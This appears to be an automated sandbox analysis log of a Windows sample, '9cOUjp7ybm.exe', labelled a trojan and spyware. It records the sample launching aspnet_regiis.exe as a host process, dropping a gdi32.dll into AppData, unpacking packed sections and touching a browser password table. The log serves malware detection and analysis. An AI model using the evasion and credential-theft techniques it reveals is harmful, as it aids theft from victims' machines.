Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027D02E0	2_2_027D02E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B3288	2_2_027B3288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CBB60	2_2_027CBB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C8890	2_2_027C8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A2120	2_2_027A2120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0279A9B0	2_2_0279A9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0279E635	2_2_0279E635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027986F0	2_2_027986F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0279D6C5	2_2_0279D6C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BAF45	2_2_027BAF45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B24ED	2_2_027B24ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AECC0	2_2_027AECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A627D	2_2_027A627D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02794260	2_2_02794260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B3A50	2_2_027B3A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02799240	2_2_02799240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C9A00	2_2_027C9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AD2F0	2_2_027AD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027982B0	2_2_027982B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CF2B0	2_2_027CF2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C2290	2_2_027C2290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CC280	2_2_027CC280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B5370	2_2_027B5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C6B5C	2_2_027C6B5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CF350	2_2_027CF350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C9B49	2_2_027C9B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02798B30	2_2_02798B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BD330	2_2_027BD330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0279FB16	2_2_0279FB16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CF3E0	2_2_027CF3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A93D2	2_2_027A93D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C5BAA	2_2_027C5BAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02794BA0	2_2_02794BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CF040	2_2_027CF040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AB839	2_2_027AB839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AD020	2_2_027AD020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02799814	2_2_02799814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C0800	2_2_027C0800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BD0FF	2_2_027BD0FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027958C0	2_2_027958C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027938B0	2_2_027938B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C20A0	2_2_027C20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B796F	2_2_027B796F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B1960	2_2_027B1960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B8150	2_2_027B8150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CF130	2_2_027CF130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A71F0	2_2_027A71F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BA9F0	2_2_027BA9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BE1C6	2_2_027BE1C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027961B0	2_2_027961B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C71AD	2_2_027C71AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C81A0	2_2_027C81A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A9980	2_2_027A9980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B3E61	2_2_027B3E61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BB65A	2_2_027BB65A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02796640	2_2_02796640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02795E10	2_2_02795E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02792EB0	2_2_02792EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0279AE90	2_2_0279AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A4760	2_2_027A4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B6760	2_2_027B6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A7F48	2_2_027A7F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BB748	2_2_027BB748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B6740	2_2_027B6740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C7F40	2_2_027C7F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B873A	2_2_027B873A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B9720	2_2_027B9720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02799710	2_2_02799710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A6F13	2_2_027A6F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AD700	2_2_027AD700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BA7F0	2_2_027BA7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CCFF7	2_2_027CCFF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CFFE0	2_2_027CFFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B8FD0	2_2_027B8FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BB7C3	2_2_027BB7C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A7FB1	2_2_027A7FB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CBFB0	2_2_027CBFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C9460	2_2_027C9460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B0440	2_2_027B0440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AB432	2_2_027AB432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02797420	2_2_02797420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027ADC10	2_2_027ADC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BE4F1	2_2_027BE4F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CFCE0	2_2_027CFCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BDCAF	2_2_027BDCAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027C648E	2_2_027C648E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027AFC89	2_2_027AFC89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027BFDD0	2_2_027BFDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A1598	2_2_027A1598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B1D90	2_2_027B1D90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02797FB0 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 027A4750 appears 78 times

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224

Source: 9cOUjp7ybm.exe, 00000000.00000000.1695875226.000000000048C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQuinnSamuelYvonne.lnknxLs4 vs 9cOUjp7ybm.exe
Source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9cOUjp7ybm.exe
Source: 9cOUjp7ybm.exe	Binary or memory string: OriginalFilenameQuinnSamuelYvonne.lnknxLs4 vs 9cOUjp7ybm.exe

Source: 9cOUjp7ybm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9cOUjp7ybm.exe

Static PE information: Section: <qqo!9W ZLIB complexity 1.0003197898327465

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027C8890 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_027C8890

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7616

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7477035f-5bf5-453e-8eed-8ecdf9296fc2

Jump to behavior

Source: 9cOUjp7ybm.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1730183416.0000000004F08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730590484.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9cOUjp7ybm.exe	ReversingLabs: Detection: 65%
Source: 9cOUjp7ybm.exe	Virustotal: Detection: 66%

Source: 9cOUjp7ybm.exe	String found in binary or memory: -addpset
Source: 9cOUjp7ybm.exe	String found in binary or memory: -addfulltrust
Source: 9cOUjp7ybm.exe	String found in binary or memory: -addgroup
Source: 9cOUjp7ybm.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

File read: C:\Users\user\Desktop\9cOUjp7ybm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9cOUjp7ybm.exe "C:\Users\user\Desktop\9cOUjp7ybm.exe"
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9cOUjp7ybm.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9cOUjp7ybm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, WEREB44.tmp.dmp.4.dr
Source:	Binary string: C:\Users\user\Desktop\9cOUjp7ybm.PDBD{ source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WEREB44.tmp.dmp.4.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbs source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WEREB44.tmp.dmp.4.dr
Source:	Binary string: \??\C:\Users\user\Desktop\9cOUjp7ybm.PDBr source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

Unpacked PE file: 0.2.9cOUjp7ybm.exe.3d0000.0.unpack <qqo!9W:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: 9cOUjp7ybm.exe	Static PE information: section name: <qqo!9W
Source: 9cOUjp7ybm.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D2A40 push esp; iretd	0_2_003D2A42
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0042FAB0 push eax; mov dword ptr [esp], 69686F3Eh	0_2_0042FAB4
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003DBC5E push eax; ret	0_2_003DBC6B
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003DD4A7 push eax; ret	0_2_003DD4AD
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D54F4 push es; ret	0_2_003D550A
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D6D12 pushad ; retf	0_2_003D6D60
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D6D42 pushad ; retf	0_2_003D6D60
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D4DB4 push eax; retf	0_2_003D4DF1
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D659F push edx; retf	0_2_003D65C2
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D9763 push cs; retf	0_2_003D97F2
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D979A push cs; retf	0_2_003D97F2
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D97F4 push cs; retf	0_2_003D9802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CBF20 push eax; mov dword ptr [esp], EAEBF4F5h	2_2_027CBF2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CEFB0 push eax; mov dword ptr [esp], 69686F3Eh	2_2_027CEFB4

Source: 9cOUjp7ybm.exe

Static PE information: section name: <qqo!9W entropy: 7.999708454943257

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
